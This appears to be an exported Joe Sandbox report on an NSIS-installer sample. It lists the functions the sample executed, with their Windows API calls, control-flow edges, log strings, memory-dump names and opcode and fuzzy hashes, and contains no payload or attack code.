                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Control-flow Graph
• Graph rendering not recoverable from the extracted page; function entry block 4035b3 (executed/not-executed colouring lost).
APIs
• GetTickCount.KERNEL32 ref: 004035C4
• GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
Strings
• u+, xrefs: 00403632
• Error launching installer, xrefs: 00403603
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
• Inst, xrefs: 00403698
• soft, xrefs: 004036A1
• Null, xrefs: 004036AA
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$u+
• API String ID: 4283519449-3463419070
• Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
• Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
• Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
• Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Control-flow Graph
• Graph rendering not recoverable from the extracted page; function entry block 40337f (executed/not-executed colouring lost).
APIs
• GetTickCount.KERNEL32 ref: 004033F1
• GetTickCount.KERNEL32 ref: 00403492
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
• wsprintfW.USER32 ref: 004034CE
• WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
• WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: (]C$... %d%%$pAB$yAB
• API String ID: 651206458-2023174797
• Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
• Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                    • String ID: %MxBearing%$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                                    • API String ID: 1459762280-4223719792
                                                                                                                                                                                                                                                                                    • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
• Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Control-flow Graph
control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
• Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Control-flow Graph
control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: %MxBearing%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
• API String ID: 247603264-2396929154
• Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
• Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Control-flow Graph
control_flow_graph 818 405073-405091 OleInitialize call 403ddb 820 405096-405098 818->820 821 4050c7-4050de call 403ddb OleUninitialize 820->821 822 40509a 820->822 823 40509d-4050a3 822->823 825 4050e1-4050ec call 4062cf 823->825 826 4050a5-4050bf call 4062cf call 40139d 823->826 833 4050ed-4050f5 825->833 826->833 836 4050c1 826->836 833->823 835 4050f7 833->835 835->821 836->821
APIs
• OleInitialize.OLE32(00000000), ref: 00405083
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
• OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
• Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
• Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Control-flow Graph

• Block 837 (4021b5-40220b): call 40145c * 4, call 404f9e, ShellExecuteW
• Block 848 (402223-4030f2): call 4062cf
• Block 849 (40220d-40221b): call 4062cf
• Edges: 837->848, 837->849, 849->848
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247
• Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
• Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
• Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
• Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
• Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
